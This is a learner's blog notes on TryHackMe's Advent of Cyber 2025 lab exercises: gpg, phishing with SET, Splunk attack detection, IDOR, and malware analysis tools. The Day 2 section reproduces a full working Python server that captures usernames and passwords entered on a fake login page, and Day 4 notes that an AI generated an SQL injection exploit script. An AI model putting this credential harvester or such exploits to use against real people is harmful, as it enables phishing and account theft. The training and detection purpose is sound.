My notes on TryHackMe’s Advent Of Cyber 2025
Day 1: Linux CLI
Things learned while doing Side Quest 1
Symmetric encryption and decryption using gpg
Symmetric Encryption
gpg --symmetric NAME_OF_FILE_TO_ENCRYPTalternate command(s) to achieve the same
gpg -c NAME_OF_FILE_TO_ENCRYPT
--OR--
gpg -c --no-symkey-cache NAME_OF_FILE_TO_ENCRYPT
# --no-symkey-cache to avoid gpg agent from caching the passphrase Symmetric Decryption
gpg --decrypt NAME_OF_FILE_TO_DECRYPTalternate command(s) to achieve the same
gpg -d NAME_OF_FILE_TO_DECRYPT
--OR--
gpg -d --no-symkey-cache NAME_OF_FILE_TO_DECRYPT
# --no-symkey-cache to avoid gpg agent from caching the passphrase Day 2: Phishing – Merry Clickmas
Learned to launch a social engineering attack using Social-Engineering Toolkit (SET).
Used Social-Engineering Toolkit (SET) to create and deliver phishing email and harvested password using a custom HTTP server.
Following steps were followed
- Used Social-Engineering Toolkit (SET) to create and deliver phishing email.
- The content of the phishing email contained malicious link to a custom HTTP server
- The custom HTTP server hosted a fake login page
- The custom server also intercepted and logged (harvested) the credentials entered by victim users on that page.
The custom HTTP server script was provided by THM and looked something like this:
#!/usr/bin/env python3
from http.server import HTTPServer, BaseHTTPRequestHandler
import urllib.parse, os, sys, datetime
HOST = '0.0.0.0'
PORT = 8000
HERE = os.path.dirname(os.path.abspath(__file__))
CREDS_FILE = os.path.join(HERE, 'logged_credentials.txt')
class H(BaseHTTPRequestHandler):
def log(self, msg):
ts = datetime.datetime.now().isoformat(sep=' ', timespec='seconds')
line = f"[{ts}] {msg}"
print(line, flush=True)
def do_GET(self):
if self.path in ('/', '/index.html'):
self.send_response(200)
self.send_header('Content-Type','text/html; charset=utf-8')
self.end_headers()
with open(os.path.join(HERE,'index.html'),'rb') as f:
self.wfile.write(f.read())
return
self.send_response(404)
self.end_headers()
def do_POST(self):
if self.path == '/submit':
length = int(self.headers.get('Content-Length', 0))
body = self.rfile.read(length).decode('utf-8')
data = urllib.parse.parse_qs(body)
user = data.get('username',[''])[0]
pw = data.get('password',[''])[0]
with open(CREDS_FILE, 'a') as fh:
fh.write(f"{datetime.datetime.now().isoformat()}\t{self.client_address[0]}\t{user}\t{pw}\n")
self.log(f"Captured -> username: {user} password: {pw} from: {self.client_address[0]}")
self.send_response(303)
self.send_header('Location', '/')
self.end_headers()
return
self.send_response(404)
self.end_headers()
if __name__ == '__main__':
print("Starting server on http://%s:%d" % (HOST, PORT))
httpd = HTTPServer((HOST, PORT), H)
try:
httpd.serve_forever()
except KeyboardInterrupt:
print("Shutting down")
httpd.server_close()
sys.exit(0)Day 3: Log Analysis with Splunk
Splunk was used for analysing log and detecting an attack
Following activities were done on the log
- Triage
- Visualise
- Detect Anomaly
- Filtered out benign values
- Narrowed down suspicious IPs
- Traced the attack chain
- Reconnaissance (footprinting)
- Enumeration
- SQL injection attack
- Looked for exfiltration attempts
- Looked for ransomeware staging & RCE
- Correlated outbound C2 communication
- Detected volume of data exfilterated
Splunk filter command(s) used at each stage
- Triage
index=main
index=main sourcetype=web_traffic - Visualise
index=main sourcetype=web_traffic | timechart span=1d countindex=main sourcetype=web_traffic | timechart span=1d count| sort by -countindex=main sourcetype=web_traffic | timechart span=1d count | sort by count | reverse - Detect Anomaly
Observed user_agent, client_ip and path - Filtered out benign values
index=main sourcetype=web_traffic user_agent!=*Mozilla* user_agent!=*Chrome* user_agent!=*Safari* user_agent!=*Firefox* - Narrowed down suspicious IPs
sourcetype=web_traffic user_agent!=*Mozilla* user_agent!=*Chrome* user_agent!=*Safari* user_agent!=*Firefox* | stats count by client_ip | sort -count | head 5 - Traced the attack chain
- Reconnaissance (footprinting)
Checked if the attacker probed for exposed configuration filessourcetype=web_traffic client_ip="<SUSPICIOUS_IP>" AND path IN ("/.env", "/phpinfo", "/.git*") | table _time, path, user_agent, status - Enumeration
Checked if the attacker tried to perform common path traversal and leverage any open redirect vulnerabilitiessourcetype=web_traffic client_ip="<SUSPICIOUS_IP>" AND path="*..*" OR path="*redirect*" - SQL injection attack
Checked if the attacker used any known SQL injection tools and how (specifically use of sleep() command was noticed in the path column)sourcetype=web_traffic client_ip="<SUSPICIOUS_IP - Exfiltration attempts
Checked if the attacker attempted any large file downloads or tried to fetch sensitive files such as backups or logssourcetype=web_traffic client_ip="<SUSPICIOUS_IP>" AND path IN ("*backup.zip*", "*logs.tar.gz*") | table _time path, user_agent - Ransomeware staging & RCE
Checked to see attacker made any requests related to bunnyware and shell.phpsourcetype=web_traffic client_ip="<SUSPICIOUS_IP>" AND path IN ("*bunnylock.bin*", "*shell.php?cmd=*") | table _time, path, user_agent, status - Correlated outbound C2 communication
Then we searched firewall_logs for the compromised server IP as the soure and the attacker’s as the destinationsourcetype=firewall_logs src_ip="<VICTIM_IP>" AND dest_ip="<SUSPICIOUS_IP>" AND action="ALLOWED" | table _time, action, protocol, src_ip, dest_ip, dest_port, reason - Detected volume of data exfilterated
Then we calculated sum of the bytes exfiltrated (bytes transferred to the attack server)sourcetype=firewall_logs src_ip="<VICTIM_IP>"AND dest_ip="<SUSPICIOUS_IP>" AND action="ALLOWED" | stats sum(bytes_transferred) by src_ip
- Reconnaissance (footprinting)
Day 4: AI in Security
AI was utilised to help these teams:
- Red Team: Generated and used a script to exploit an SQL injection vulneratbility
- Blue: Analysed web logs of the SQL injection attack that was just performed
- Software: Analysed the source code, that was involved in the above experiment, for vulnerabilities
Day 5: IDOR – Web application vulnerability
Local Storage
I have learned and practiced IDOR before, but what I learned new in this exercise was to exploit the same through the Local Storage. We examined how a particular (deliberately) vulnerable app stored authenticated user details in the Local Storage on client’s browser and we exploited it.
Encoding / Hiding reference IDs
With the help of Developer Tool (Inspect) in the browser, we also examined various encodings used by the application in an attempt to hide resource/reference “id”s from the plain sight for example – base64, MD5 (hash), UUID
UUID and UUID Decoder
We were introduced to an online tools to decode UUID: UUID Decoder – https://www.uuidtools.com/decode
Besides that I also learned –
Vulnerability of UUID Version 1
With the knowledge that when exactly a particular UUID version 1 was generated (exact date and exact time) then it can be recovered OR in other words if a hacker can learn which time-window a UUID version 1 was possibly generated then he can brute-force by trying each second within that window.
Day 6: Malware Analysis
Learned basics of Static and Dynamic analysis of Windows executables.
Static Application Security Testing (SAST)
I learned the basics of static analysis of Windows executable using the following tool:
- PeStudio
After a brief overview, hands-on excercise involved examining SHA256 and Strings section of a Windows executable
Dynamic Application Security Testing (DAST)
I learned the basics of dynamic analysis of Windows executable using the following tools:
- Regshot
I got introduction of this awesome tool. Its capabilities is to take snapshots of Windows registry at different specified times (typically before and after an incident), and to compare and pinpoint the differences between the two to ease the analysis of the malicious activity - ProcMon
This popular tool, along with the Sysinternal suite it comes with, needs no introduction. In this hands-on exercise we explored its capability to filter certain activities (e.g. Process Name, Operation – network/TCP/ activities) to help us focus on those appearing to be suspicious.
Day 7: Network Discovery (using nmap)
<Getting there>
Day 8: Prompt Injection
<Getting there>
Day 9: Password Cracking
<Getting there>
Day 10: SOC Alert Triaging
<Getting there>
Day 11: XSS – Web application vulnerability
<Done. Yet to write my learnings>
Day 12: Phishing
<Getting there>
Day 13: YARA Rules
<Getting there>
Day 14: Containers
<Getting there>